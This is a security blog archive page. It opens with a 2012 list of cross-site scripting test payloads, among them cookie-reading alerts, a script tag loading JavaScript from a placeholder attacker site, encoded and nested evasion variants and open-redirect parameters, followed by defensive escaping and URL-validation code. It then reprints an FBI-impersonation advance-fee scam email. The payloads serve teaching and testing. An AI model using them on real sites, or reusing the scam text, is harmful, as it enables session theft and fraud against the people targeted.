‘Hacking’ Posts
Cross Site Scripting Notation Examples
These were compiled in September of 2012. If you are reading this way off in the future, you will want to go back and verify that these still work.
So what types of testing can you do for Cross Site Scripting? This is a quick collection of standard Cross Site Scripting notation from around the internet: security blogs, security sites, and some of the more interesting underground web sites out there. These are just examples of the code that you can use to test for cross site scripting.
<script>alert(document.cookie);</script> This will steal someone else’s cookie or otherwise access a cookie that you might not otherwise have access to.
<SCRIPT SRC=http://YourWebSite.com/YourEvilJavaScript.js></SCRIPT> This will inject your JavaScript from a site you own or control, or from a JavaScript file you have successfully put on the web server you are cross site scripting. It is best to use their server for your evil script to take advantage of the system’s trust. Your computer might not be trusted, and that would throw some interesting errors that the client might see.
<BODY BACKGROUND="javascript:alert('XSS')"> Using the body background attribute to inject a script into your vulnerable system.
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> Using an IFRAME as an injection possibility.
<body onload=alert('test')> Loads the XSS using the body onload event handler.
<IMG SRC=jAvascript:alert('test')> Using an IMG tag to alert when the image loads.
<script>alert('Xss By Your Name here')</script> Using a standard JavaScript alert notation.
SomePage.php?url=http://EvilHackerSite.com Simple redirect to a page of your choice.
</script><script>alert%28document.cookie%29</script><script> Nested script tags for evasion, if you think the site you are looking at is protected by a firewall or other security system.
%22%3E%3Cscript%3Ealert%28%22http://st2tea.blogspot.com%22%29%3C/script%3E Using UTF-8 or other encoding for evasion.
POST: retURL=http%3A%2F%2Fwww.xssed.com%2F Using a POST request to redirect to a different URL than intended.
POST: keywords=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&search.x=0&search.y=0 Using POST to subvert the internal site search engine (all sites have a search feature unless they are horribly out of date).
There are a lot of places out there that have a lot of very good examples. These were pulled from XSSED.com, Hackers.org, and CGI-Security. These are being used in my Application Hacking class at Highline Community College, in a private network, with known vulnerable software. No system was compromised in the pursuit of this knowledge. Please don’t try this at home.
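Seen from the defending side, the strings above make good regression inputs. The following is an added example, not code from the original post: it percent-decodes a parameter once, HTML-encodes it before echoing it back, and validates redirect or URL-attribute targets. The function names and the allow-listed host www.example.com are assumptions.

```javascript
// Added example (not from the original post). All function names and the
// allow-listed host are hypothetical.

// Constructed regression inputs: strings taken from the list in the post.
const SAMPLES = [
  "<script>alert(document.cookie);</script>",
  "<IMG SRC=jAvascript:alert('test')>",
  "</script><script>alert%28document.cookie%29</script><script>",
  "%22%3E%3Cscript%3Ealert%28%22http://st2tea.blogspot.com%22%29%3C/script%3E",
  "%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E",
];

// Models the single percent-decode a web framework applies to a parameter.
function decodeParam(raw) {
  try { return decodeURIComponent(raw.replace(/\+/g, " ")); }
  catch { return raw; } // malformed escape sequence: keep the value as received
}

// Output encoding for HTML text and quoted-attribute contexts.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// The search-box case: echo the decoded keyword back inside an attribute.
function renderSearchEcho(rawKeywords) {
  return `<input name="keywords" value="${escapeHtml(decodeParam(rawKeywords))}">`;
}

// Redirect and URL-attribute case (url=, retURL=, SRC=): same-site paths or
// allow-listed https hosts only; everything else falls back.
const ALLOWED_HOSTS = new Set(["www.example.com"]); // assumption
function safeUrl(rawTarget, fallback = "/") {
  const target = decodeParam(rawTarget);
  if (/[\x00-\x1f\x7f]/.test(target)) return fallback; // reject control characters
  if (/^\/(?![\/\\])/.test(target)) return target;     // "/path", not "//host"
  try {
    const u = new URL(target);                          // parser lower-cases the scheme
    if (u.protocol === "https:" && ALLOWED_HOSTS.has(u.hostname)) return u.href;
  } catch { /* not an absolute URL */ }
  return fallback;
}

// True when no sample leaves a raw markup character after encoding.
function samplesNeutralised() {
  return SAMPLES.every((s) => !/[<>"']/.test(escapeHtml(decodeParam(s))));
}
```

Encoding happens at output time, after the one decode the framework performs, which is why the percent-encoded variants end up as inert text just like the plain ones.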
The best Spam Message I have ever received
Sometimes you just get an awesome spam message that is too sweet not to pass up. Today I got one that simply rocks. Everything left intact, including typos, formatting, and grammar. Simply brilliant.
Anti-Terrorist and Monetary Crimes Division
Fbi Headquarters In Washington, D.C.
Federal Bureau Of Investigation
J. Edgar Hoover Building
935 Pennsylvania Avenue, NW
Washington, D.C. 20535-0001
Website: www.fbi.gov
Attention, this is the final warning you are going to receive from me do you get me?
I hope youre understand how many times this message has been sent to you?.
We have warned you so many times and you have decided to ignore our e-mails or because you believe we have not been instructed to get you arrested, and today if you fail to respond back to us with the payment then, we would first send a letter to the mayor of the city where you reside and direct them to close your bank account until you have been jailed and all your properties will be confiscated by the fbi. We would also send a letter to the company/agency that you are working for so that they could get you fired until we are through with our investigations because a suspect is not suppose to be working for the government or any private organization.
Your id which we have in our database been sent to all the crimes agencies in America for them to inset you in their website as an internet fraudsters and to warn people from having any deals with you. This would have been solved all this while if you had gotten the certificate signed, endorsed and stamped as you where instructed in the e-mail below.this is the federal bureau of investigation (fbi) am writing in response to the e-mail you sent to us and am using this medium to inform you that there is no more time left to waste because you have been given from the 3rd of January. As stated earlier to have the document endorsed, signed and stamped without failure and you must adhere to this directives to avoid you blaming yourself at last when we must have arrested and jailed you for life and all your properties confiscated.
You failed to comply with our directives and that was the reason why we didn’t hear from you on the 3rd as our director has already been notified about you get the process completed yesterday and right now the warrant of arrest has been signed against you and it will be carried out in the next 48hours as strictly signed by the fbi director. We have investigated and found out that you didn’t have any idea when the fraudulent deal was committed with your information’s/identity and right now if you id is placed on our website as a wanted person, i believe you know that it will be a shame to you and your entire family because after then it will be announce in all the local channels that you are wanted by the fbi. As a good Christian and a honest man, I decided to see how i could be of help to you because i would not be happy to see you end up in jail and all your properties confiscated all because your information’s was used to carry out a fraudulent transactions, i called the efcc and they directed me to a private attorney who could help you get the process done and he stated that he will endorse, sign and stamp the document at the sum of $98.00 usd only and i believe this process is cheaper for you.
You need to do everything possible within today and tomorrow to get this process done because our director has called to inform me that the warrant of arrest has been signed against you and once it has been approved, then the arrest will be carried out, and from our investigations we learnt that you were the person that forwarded your identity to one impostor/fraudsters in Nigeria when he had a deal with you about the transfer of some illegal funds into your bank account which is valued at the sum of $10.500,000.00 usd.
I pleaded on your behalf so that this agency could give you till 6/27/2012 so that you could get this process done because i learnt that you were sent several e-mail without getting a response from you, please bear it in mind that this is the only way that i can be able to help you at this moment or you would have to face the law and its consequences once it has befall on you. You would make the payment through western union money transfer with the below details.
NAME: VINCE DURU ADDRESS: LAGOS NIGERIA TEXT QUESTION:FOR ANSWER: YOU AMOUNT: $98 Senders name======
Send the payment details to me which are senders name and address, mtcn number, text question and answer used and the amount sent. Make sure that you didn’t hesitate making the payment down to the agency by today so that they could have the certificate endorsed, signed and stamped immediately without any further delay. After all this process has been carried out, then we would have to proceed to the bank for the transfer of your compensation funds which is valued at the sum of $10.500,000.00 usd which was suppose to have been transferred to you all this while.
Note/ all the crimes agencies have been contacted on this regards and we shall trace and arrest you if you disregard this instructions. You are given a grace today to make the payment for the document after which your failure to do that will attract a maximum arrest and finally you will be appearing in court for act of terrorism, money laundering and drug trafficking charges, so be warned not to try any thing funny because you are been watched.
THANKS FOR YOUR CO-OPERATION.
ROBERT MUELLER WASHINGTON DC Anti-Terrorist and Monetary Crimes Division Fbi Headquarters In Washington, D.C. Federal Bureau Of Investigation J. Edgar Hoover Building 935 Pennsylvania Avenue, NW Washington, D.C. 20535-0001 Website: www.fbi.gov
Cooperating with Law Enforcement in Social Networking
Social networking is facing the prospect of being deputized by the Australian Federal Police. Facebook and other social networking sites are increasingly becoming one of the most important sources for intelligence about people. Forget neighbors talking to the police, now we are looking at our socially connected world as being involved with law enforcement. [...]
Thoughts on Mobile Security and Applications
Note: I wrote this for a client last summer who was looking at a banking industry application. The application was poorly written, and I hope that they have since fixed it. It makes an interesting concept that last summer we were talking about banking and smart phones, then to see a number of these issues [...]
Three Google Hacks directed at WordPress and Buddy Press
These are not high-level attacks; rather, this falls more into the recon stage to identify specific software running on sites that are indexed by Google. The good part is that these work in Bing as well, making them much more functional in terms of identifying the use of WordPress and Buddy Press where registration [...]
One of the members of LulzSec reported to be an FBI mole
So much for not selling out your gang. It looks like Sabu, one of the folks who has been speaking for LulzSec, has been secretly working for the FBI, according to multiple online reports. LulzSec has been one of the leading hacking groups and has seriously gone after a ton of people, companies, and others [...]







